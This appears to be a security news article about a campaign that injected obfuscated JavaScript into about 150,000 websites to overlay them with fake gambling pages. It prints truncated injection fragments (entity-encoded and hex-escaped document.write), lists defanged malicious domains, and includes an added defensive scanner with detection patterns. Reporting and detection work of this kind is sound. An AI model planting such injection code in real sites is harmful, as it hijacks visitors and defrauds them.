A massive website hijacking campaign has been uncovered, affecting approximately 150,000 websites with malicious full-page redirects to Chinese gambling platforms.
The attack, which first emerged in February 2025 targeting around 35,000 sites, has rapidly expanded its reach, demonstrating the threat actors’ growing sophistication and operational scale.
The compromise involves inserting malicious code that creates a full-screen overlay in visitors’ browsers, effectively replacing legitimate website content with gambling advertisements.
These injections impersonate known betting platforms, including Bet365, and incorporate official logos to enhance their credibility and conversion rates.
CSIDE researchers identified that the attack primarily targets Chinese-speaking users in China, Hong Kong, and the United States, with many of the malicious destinations selectively blocking traffic from specific regions.
The threat actors have implemented multiple redirection URLs, including 551007t[.]cc, t399229[.]com, and W88in[.]com, among others.
Infection chain
The infection relies on sophisticated obfuscation techniques to evade detection by security tools.
The injected script uses HTML entity encoding to mask its malicious nature, as exemplified in the following code snippet:
<script type="text/javascript" charset="utf-8" rel="nofollow" src="/@p
When decoded, this obfuscated script reveals its true functionality, which includes self-decryption mechanisms that ultimately inject a reference to an external JavaScript file:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](
'\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x
);
The final payload contains sophisticated logic that checks for gambling-related keywords in the page title before creating a div element with CSS positioning that ensures the overlay covers the entire viewport.
It also enforces mobile-friendly viewing parameters through viewport tag manipulation to maximize effectiveness across all devices.
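A defender-side check for the two obfuscation layers described above (character references inside a script src, and a hex-escaped document.write) is sketched below. It is an added example, not code from CSIDE or the original article; the function names and the sample page with its example.invalid host are constructed for illustration.

```javascript
// Decode numeric HTML character references such as &#47; or &#x2f;.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Decode JavaScript \xHH and \uHHHH escapes as text; nothing is evaluated.
function decodeJsEscapes(s) {
  return s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Scan raw HTML source and return a list of findings for review.
function scanHtml(html) {
  const findings = [];
  // Layer 1: a <script src> written with character references.
  // Legitimate pages rarely entity-encode the path or host of a script.
  const srcRe = /<script\b[^>]*?\bsrc\s*=\s*(["'])(.*?)\1/gis;
  for (const m of html.matchAll(srcRe)) {
    const raw = m[2];
    const encoded = (raw.match(/&#x?[0-9a-f]+;?/gi) || []).length;
    if (encoded >= 3) {
      findings.push({ type: "entity-encoded-src", decoded: decodeEntities(raw) });
    }
  }
  // Layer 2: runs of hex escapes that decode to a DOM write or a script tag.
  const runRe = /(?:\\x[0-9a-f]{2}){4,}/gi;
  const decodedRuns = (html.match(runRe) || []).map(decodeJsEscapes);
  const hits = decodedRuns.filter((t) => /^(document|write)$|<script/i.test(t));
  if (hits.length > 0) {
    findings.push({ type: "hex-escaped-dom-write", decoded: hits });
  }
  return findings;
}

// Constructed sample page (not a captured injection); example.invalid is a placeholder.
const SAMPLE = String.raw`<html><head><title>Shop</title>
<script type="text/javascript" src="&#47;&#47;cdn&#46;example&#46;invalid&#47;a&#46;js"></script>
<script>window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 src="x"\x3e');</script>
<script src="/static/app.js"></script>
</head></html>`;

console.log(JSON.stringify(scanHtml(SAMPLE), null, 2));
```

Run it against the HTML a site actually serves (templates, cached pages, CMS database fields) rather than only the files in version control, since injections of this kind land in served content.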
This campaign represents a significant threat to website integrity and user security, highlighting the need for enhanced website monitoring and security practices.